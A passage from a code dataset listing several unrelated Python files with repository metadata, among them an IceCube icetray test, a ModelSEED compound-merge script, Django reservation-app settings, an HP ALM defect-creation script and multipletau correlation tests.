] | null | null | null | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
] | 3 | 2020-07-17T09:20:29.000Z | 2021-03-30T16:44:18.000Z | #!/usr/bin/env python
#
# Sample i3module in python
#
from icecube.icetray import *
from I3Tray import *
tray = I3Tray()
# generate empty frames
tray.AddModule("BottomlessSource","bottomless")
def make_counter(base):
class ShouldCounter(base):
def __init__(self, context):
base.__init__(self, context)
self.sdp = 0
def ShouldDoPhysics(self, frame):
print(base.__name__ + " *** ShouldDoPhysics")
self.sdp += 1
return True
def Physics(self, frame):
print("%s *** sdp == %d" % (base.__name__, self.sdp))
assert self.sdp == 1
self.sdp = 0
self.PushFrame(frame)
return ShouldCounter
tray.AddModule(make_counter(I3Module), "modulecounter")
tray.AddModule(make_counter(I3ConditionalModule), "conditionalmodulecounter")
# do it 5 times.
tray.Execute(5)
| 23.282051 | 77 | 0.615639 | 98 | 908 | 5.510204 | 0.510204 | 0.064815 | 0.055556 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016566 | 0.268722 | 908 | 38 | 78 | 23.894737 | 0.796687 | 0.092511 | 0 | 0.090909 | 1 | 0 | 0.121175 | 0.029376 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.409091 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10db498d974995cdddc73b0eb663f988c2c1a75e | 3,405 | py | Python | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os, sys
temp=list();
header=1;
sys.path.append('../../Libs/Python')
from BiochemPy import Reactions, Compounds
ReactionsHelper = Reactions()
Reactions_Dict = ReactionsHelper.loadReactions()
CompoundsHelper = Compounds()
Compounds_Dict = CompoundsHelper.loadCompounds()
Compound_To_Merge_From="cpd00013"
Compound_To_Merge_To="cpd19013"
Cpds_Rxns_Dict=dict()
Rxns_Cpds_Dict=dict()
for rxn in Reactions_Dict.keys():
if(Reactions_Dict[rxn]["status"] == "EMPTY"):
continue
for rgt in Reactions_Dict[rxn]["stoichiometry"].split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
if(cpd not in Cpds_Rxns_Dict):
Cpds_Rxns_Dict[cpd]=dict()
Cpds_Rxns_Dict[cpd][rxn]=1
if(rxn not in Rxns_Cpds_Dict):
Rxns_Cpds_Dict[rxn]=dict()
Rxns_Cpds_Dict[rxn][cpd]=1
#Merging two compounds means:
#1) You take all the reactions for the second compound, and replace the compound id in the second reaction with the first compound
#Change stoichiometry only, first
#2) You check to see if all the reactions are balanced following the change
#3) You need to check to see if new reactions are now merged/linked to other reactions in database
#If truly still new reaction, change definition, code, compound_ids, equation
#If merged, change to obsolete and store linked reaction(s)
#4) You need to update Aliases
#5) You need to update media
#6) You need to report possible updates in templates (and, following modifications, re-build any public models?)
for rxn in Cpds_Rxns_Dict[Compound_To_Merge_From].keys():
old_stoichiometry = Reactions_Dict[rxn]["stoichiometry"]
new_stoichiometry_array = list()
for rgt in old_stoichiometry.split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
#Replace cpd
if(cpd == Compound_To_Merge_From):
cpd = Compound_To_Merge_To
new_stoichiometry_array.append(":".join([coeff,cpd,cpt,index,name]))
new_stoichiometry = ";".join(new_stoichiometry_array)
if(new_stoichiometry == old_stoichiometry):
print rxn, old_stoichiometry, new_stoichiometry
break
sys.exit()
Update_Reactions=0
for rxn in sorted(Reactions_Dict.keys()):
if(Reactions_Dict[rxn]["status"] == "EMPTY"):
continue
Rxn_Cpds_Array=list()
for rgt in Reactions_Dict[rxn]["stoichiometry"].split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
rgt_id = cpd+"_"+cpt+index
Rxn_Cpds_Array.append({"reagent":rgt_id,"coefficient":coeff,
"formula":Compounds_Dict[cpd]["formula"],
"charge":Compounds_Dict[cpd]["charge"]})
Status = ReactionsHelper.balanceReaction(Rxn_Cpds_Array)
if("ERROR" in Status):
# print rxn,Status
continue
#Remove old HB message
old_status = ""
for item in Reactions_Dict[rxn]["status"].split("|"):
if(item != "HB"):
old_status += item+"|"
old_status = old_status[0:-1]
if(Status != old_status and ("OK" not in old_status and "OK" not in Status)):
print "Changing Status for "+rxn+" from "+Reactions_Dict[rxn]["status"]+" to "+Status
Reactions_Dict[rxn]["status"]=Status
Update_Reactions=1
#if(Update_Reactions==1):
# print "Saving reactions";
# ReactionsHelper.saveReactions(Reactions_Dict)
| 34.744898 | 130 | 0.676065 | 455 | 3,405 | 4.883516 | 0.272527 | 0.070207 | 0.057606 | 0.049505 | 0.205671 | 0.150765 | 0.133663 | 0.133663 | 0.133663 | 0.133663 | 0 | 0.009937 | 0.202056 | 3,405 | 97 | 131 | 35.103093 | 0.807876 | 0.246402 | 0 | 0.166667 | 0 | 0 | 0.081601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.033333 | null | null | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10dc80116f563ea0a2e9886f4435631d1b02b4b4 | 299 | py | Python | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | null | null | null | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | 49 | 2021-01-12T07:25:17.000Z | 2022-03-12T00:53:24.000Z | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | null | null | null | from loguru import logger
from multifile02 import sum_ab
def run():
logger.add("log_multifile.log")
logger.info("="*30)
logger.info("start run")
sum_ab(5, 7)
logger.info("end run")
def main():
run()
logger.success('Complete.')
if __name__ == "__main__":
main()
| 14.95 | 35 | 0.625418 | 41 | 299 | 4.292683 | 0.560976 | 0.170455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.217391 | 299 | 19 | 36 | 15.736842 | 0.726496 | 0 | 0 | 0 | 0 | 0 | 0.170569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | true | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10dd33d3f2c88f6ed9447b48563fc0a3cb09360a | 4,903 | py | Python | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 1 | 2018-11-10T14:57:54.000Z | 2018-11-10T14:57:54.000Z | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 6 | 2020-06-05T17:11:56.000Z | 2021-09-07T23:38:00.000Z | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 1 | 2019-04-16T20:00:05.000Z | 2019-04-16T20:00:05.000Z | # coding=utf-8
"""
Django settings for reservas project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import random
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Establece la clave secreta a partir de la variable de entorno 'DJANGO_SECRET_KEY', o genera una
# clave aleatoria si ésta no se encuentra seteada.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY',
''.join([random.SystemRandom()
.choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)')
for i in range(50)]))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Administradores del proyecto.
ADMINS = []
MANAGERS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'djangobower',
'app_facturacion',
'app_reservas.apps.ReservasConfig',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'reservas.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'debug': DEBUG,
},
},
]
WSGI_APPLICATION = 'reservas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Establece el prefijo para el proyecto Django, según la configuración
# del servidor web.
DJANGO_URL_PREFIX = os.environ.get('DJANGO_URL_PREFIX', '')
# Da formato al prefijo URL, para que sea de la forma '<prefijo>/'.
# 1. Quita las barras iniciales y finales, por si el prefijo cuenta con más de una.
DJANGO_URL_PREFIX = DJANGO_URL_PREFIX.strip('/')
# 2. Añade una única barra final, en caso de que el prefijo no haya quedado vacío luego de la
# operación anterior.
if DJANGO_URL_PREFIX:
DJANGO_URL_PREFIX += '/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/' + DJANGO_URL_PREFIX + 'static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'djangobower.finders.BowerFinder',
)
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/' + DJANGO_URL_PREFIX + 'media/'
EVENTOS_URL = 'media/app_reservas/eventos_recursos/'
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')
BOWER_INSTALLED_APPS = (
'bootstrap-datepicker#1.6.0',
'bootswatch-dist#3.3.6-flatly',
'font-awesome#4.7.0',
'fullcalendar-scheduler',
'handsontable#0.31.2',
'jquery#1.9.1',
'pace#1.0.2',
'qtip2#2.2.1',
'slick-carousel#1.6.0'
)
# Token de Google Calendar, utilizado para consultar la información de eventos
# de los calendarios de Google Calendar.
GOOGLE_CALENDAR_TOKEN = os.environ.get('GOOGLE_CALENDAR_TOKEN', '')
BROKER_URL = os.environ.get('BROKER_URL', 'amqp://guest:guest@rabbit//')
| 29.011834 | 98 | 0.698756 | 598 | 4,903 | 5.608696 | 0.423077 | 0.054264 | 0.035778 | 0.029219 | 0.140429 | 0.130292 | 0.081097 | 0.081097 | 0.023852 | 0 | 0 | 0.015764 | 0.171936 | 4,903 | 168 | 99 | 29.184524 | 0.810345 | 0.314705 | 0 | 0 | 1 | 0 | 0.467548 | 0.361178 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021505 | 0 | 0.021505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10df133a433492185e9da42e3e25c81ed4744f41 | 2,206 | py | Python | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | null | null | null | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | 1 | 2019-05-13T17:36:45.000Z | 2019-05-13T17:36:45.000Z | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | 3 | 2019-05-10T17:48:20.000Z | 2020-07-08T14:22:20.000Z | #
# Copyright 2021 XEBIALABS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from alm.almClientUtil import almClientUtil
from java.util import Calendar
import json
alm_client = almClientUtil.create_alm_client(server, username, password)
cookies = alm_client.login()
alm_client = almClientUtil.create_alm_client(server, cookies=cookies.get_dict())
content = {
"data": [
{
"type": "defect",
"name": title,
"description": description,
"severity": severity,
"detected-by": detectedBy,
"creation-time": "%s-%s-%s"
% (
str(Calendar.getInstance().get(Calendar.YEAR)),
str(Calendar.getInstance().get(Calendar.MONTH) + 1), # zero indexed
str(Calendar.getInstance().get(Calendar.DAY_OF_MONTH)),
),
}
]
}
for additionalField in additionalFields.keys():
content["data"][0][additionalField] = additionalFields[additionalField]
result = alm_client.create_defect(domain, project, json.dumps(content))
defectId = result["data"][0]["id"]
output = json.dumps(result)
print "Successfully created a defect with id [ %s ]" % defectId
logout = alm_client.logout()
| 50.136364 | 462 | 0.714415 | 286 | 2,206 | 5.465035 | 0.51049 | 0.056302 | 0.042226 | 0.047985 | 0.118362 | 0.055022 | 0.055022 | 0 | 0 | 0 | 0 | 0.003959 | 0.198549 | 2,206 | 43 | 463 | 51.302326 | 0.880091 | 0.479601 | 0 | 0 | 0 | 0 | 0.108179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.033333 | 0.1 | null | null | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10e1be91406866f0d1fa96365de13d361b7ae9cd | 291 | py | Python | nltktest.py | HeikkiKeskustalo/Fuzzy-String-Matching | 21215d58473f2af72c039d6d3c186e18f04dd893 | [
"MIT"
] | null | null | null | nltktest.py | HeikkiKeskustalo/Fuzzy-String-Matching | 21215d58473f2af72c039d6d3c186e18f04dd893 | [
"MIT"
] | 7 | 2018-06-28T03:57:04.000Z | 2018-08-28T12:37:19.000Z | nltktest.py | EvoluzTampere/Fuzzy-String-Matching | 9137f23f9713e2778a8894cbfd3ef1dc34913599 | [
"MIT"
] | 1 | 2018-08-07T07:41:00.000Z | 2018-08-07T07:41:00.000Z | from nltk.stem.snowball import SnowballStemmer
letter = [u'kissassa']
for word in letter:
print word, SnowballStemmer("finnish").stem(word)
# read file (get a string)
# detect charset (UTF-8)
# decode (get a Unicode code point presentation)
# tokenize
# try out the Snowball stemmer
| 20.785714 | 53 | 0.738832 | 41 | 291 | 5.243902 | 0.804878 | 0.037209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004115 | 0.164948 | 291 | 13 | 54 | 22.384615 | 0.880658 | 0.453608 | 0 | 0 | 0 | 0 | 0.098684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.25 | null | null | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10eabbde5c8c1ecebe18272de8da83e00ed981a5 | 2,711 | py | Python | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | 1 | 2017-11-26T18:53:40.000Z | 2017-11-26T18:53:40.000Z | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | 13 | 2015-01-22T23:47:52.000Z | 2022-01-13T20:22:34.000Z | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from django.conf import settings
from django.http import HttpResponse
from django.test import (
Client,
TestCase,
)
from satchless.cart.tests import TestCart
from ...cart.models import CART_SESSION_KEY
from ...order.app import order_app
from ...pricing import handler as pricing_handler
from ...product.tests import DeadParrot
from ...product.tests.pricing import FiveZlotyPriceHandler
from ...order.tests import TestOrder
from ..app import CheckoutApp
class BaseCheckoutAppTests(TestCase):
def _create_cart(self, client):
cart = self._get_or_create_cart_for_client(client)
cart.replace_item(self.macaw_blue, 1)
return cart
def _get_or_create_cart_for_client(self, client=None, typ='cart'):
try:
return TestCart.objects.get(
pk=client.session[CART_SESSION_KEY % typ])[0]
except KeyError:
cart = TestCart.objects.create(typ=typ)
client.session[CART_SESSION_KEY % typ] = cart.pk
return cart
def _get_or_create_order_for_client(self, client):
order_pk = client.session.get('satchless_order', None)
return self.checkout_app.order_model.objects.get(pk=order_pk)
def _create_order(self, client):
self._create_cart(client)
return self._get_order_from_session(client.session)
def _get_order_from_session(self, session):
order_pk = session.get('satchless_order', None)
if order_pk:
return self.checkout_app.order_model.objects.get(pk=order_pk)
return None
def _get_order_items(self, order):
order_items = set()
for group in order.groups.all():
order_items.update(group.items.values_list('product_variant',
'quantity'))
return order_items
class MockCheckoutApp(CheckoutApp):
cart_model = TestCart
order_model = TestOrder
def checkout(self, *args, **kwargs):
return HttpResponse()
class App(BaseCheckoutAppTests):
checkout_app = MockCheckoutApp()
def setUp(self):
self.anon_client = Client()
self.macaw = DeadParrot.objects.create(slug='macaw',
species="Hyacinth Macaw")
self.macaw_blue = self.macaw.variants.create(color='blue',
looks_alive=False)
self.original_handlers = settings.SATCHLESS_PRICING_HANDLERS
pricing_handler.pricing_queue = pricing_handler.PricingQueue(FiveZlotyPriceHandler)
def tearDown(self):
pricing_handler.pricing_queue = pricing_handler.PricingQueue(*self.original_handlers)
| 34.316456 | 93 | 0.677241 | 321 | 2,711 | 5.464174 | 0.267913 | 0.039909 | 0.023945 | 0.017104 | 0.230901 | 0.198974 | 0.116306 | 0.057013 | 0.057013 | 0.057013 | 0 | 0.001446 | 0.234969 | 2,711 | 78 | 94 | 34.75641 | 0.844262 | 0.007746 | 0 | 0.064516 | 0 | 0 | 0.029762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145161 | false | 0 | 0.193548 | 0.016129 | 0.580645 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
10f540c5034ca1b5afdb44405af84acd35b8db36 | 385 | py | Python | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 692 | 2016-12-19T23:25:35.000Z | 2022-03-31T14:20:48.000Z | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 509 | 2017-03-28T19:37:18.000Z | 2022-03-31T20:31:43.000Z | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 228 | 2016-12-19T05:03:30.000Z | 2022-03-22T18:13:00.000Z | # test unicode in identifiers
# comment
# αβγδϵφζ
# global identifiers
α = 1
αβγ = 2
bβ = 3
βb = 4
print(α, αβγ, bβ, βb)
# function, argument, local identifiers
def α(β, γ):
δ = β + γ
print(β, γ, δ)
α(1, 2)
# class, method identifiers
class φ:
def __init__(self):
pass
def δ(self, ϵ):
print(ϵ)
zζzζz = φ()
if hasattr(zζzζz, "δ"):
zζzζz.δ(ϵ=123)
| 13.75 | 39 | 0.584416 | 64 | 385 | 3.453125 | 0.53125 | 0.027149 | 0.027149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.275325 | 385 | 27 | 40 | 14.259259 | 0.759857 | 0.327273 | 0 | 0 | 0 | 0 | 0.003968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.058824 | 0 | 0 | 0.235294 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
10f5834075ee59a03333434f3790eb69637b29a2 | 552 | py | Python | examples/hsets.py | gfmartins/cssdbpy | f2369dd46caeb6bd84f2b1deacb8fb9416b26afc | [
"BSD-2-Clause"
] | 85 | 2016-09-05T19:41:37.000Z | 2021-11-08T11:26:54.000Z | examples/hsets.py | gfmartins/cssdbpy | f2369dd46caeb6bd84f2b1deacb8fb9416b26afc | [
"BSD-2-Clause"
] | 10 | 2016-09-22T06:42:08.000Z | 2018-12-12T13:55:16.000Z | examples/hsets.py | deslum/ssdbpy | 4cecc6f421bbf1782334b294569801c5808aaaa1 | [
"BSD-2-Clause"
] | 9 | 2016-09-06T08:41:32.000Z | 2020-09-08T04:04:23.000Z | from cssdbpy import Connection
from time import time
import md5
if __name__ == '__main__':
conn = Connection('127.0.0.1', 8888)
for i in xrange(0, 10000):
md5word = md5.new('word{}'.format(i)).hexdigest()
create = conn.execute('hset','words', md5word, int(time()))
value = conn.execute('hget','words', md5word)
exists = conn.execute('hexists','words', md5word)
delete = conn.execute('hdel','words', md5word)
print md5word, value, create, exists, delete
print conn.execute('hscan', 'words', '', '', 100)
conn.execute('hclear','words')
| 32.470588 | 61 | 0.677536 | 75 | 552 | 4.88 | 0.52 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056485 | 0.134058 | 552 | 16 | 62 | 34.5 | 0.709205 | 0 | 0 | 0 | 0 | 0 | 0.150362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.214286 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10fd538c1e9b6fd2668077d80094be203d83e7ee | 531 | py | Python | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | 1 | 2020-09-14T04:23:07.000Z | 2020-09-14T04:23:07.000Z | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | null | null | null | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | null | null | null | # Generated by Django 3.0 on 2020-09-09 05:08
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gyms', '0002_auto_20200903_1750'),
]
operations = [
migrations.AlterField(
model_name='gym',
name='slug_name',
field=models.CharField(max_length=10, unique=True, validators=[django.core.validators.RegexValidator(message='Can not have spaces.', regex='^[a-zA-Z0-9]$')]),
),
]
| 26.55 | 170 | 0.642185 | 63 | 531 | 5.31746 | 0.777778 | 0.059701 | 0.119403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082524 | 0.224105 | 531 | 19 | 171 | 27.947368 | 0.730583 | 0.080979 | 0 | 0 | 1 | 0 | 0.148148 | 0.047325 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8012691c1adce7b34dee33223df2c745e8a1cd12 | 5,830 | py | Python | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 10 | 2017-01-25T15:47:06.000Z | 2022-01-07T10:08:48.000Z | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 7 | 2016-02-10T10:19:22.000Z | 2018-11-30T23:21:04.000Z | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 4 | 2018-08-22T07:19:52.000Z | 2018-11-05T09:16:52.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Compare to numpy data"""
import sys
import numpy as np
import multipletau
from test_correlate import get_sample_arrays_cplx
def test_corresponds_ac():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx()).real
m = 16
restau = multipletau.autocorrelate(a=1*a,
m=m,
copy=True,
normalize=True,
dtype=np.float_)
reslin = multipletau.correlate_numpy(a=1*a,
v=1*a,
copy=True,
normalize=True,
dtype=np.float_)
idx = np.array(restau[:, 0].real, dtype=int)[:m]
assert np.allclose(reslin[idx, 1], restau[:m, 1])
def test_corresponds_ac_first_loop():
"""
numpy correlation:
G_m = sum_i(a_i*a_{i+m})
multipletau correlation 2nd order:
b_j = (a_{2i} + a_{2i+1} / 2)
G_m = sum_j(b_j*b_{j+1})
= 1/4*sum_i(a_{2i} * a_{2i+m} +
a_{2i} * a_{2i+m+1} +
a_{2i+1} * a_{2i+m} +
a_{2i+1} * a_{2i+m+1}
)
The values after the first m+1 lag times in the multipletau
correlation differ from the normal correlation, because the
traces are averaged over two consecutive items, effectively
halving the size of the trace. The multiple-tau correlation
can be compared to the regular correlation by using an even
sized sequence (here 222) in which the elements 2i and 2i+1
are equal, as is done in this test.
"""
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = [arr / np.average(arr) for arr in get_sample_arrays_cplx()]
a = np.concatenate(a)[:222]
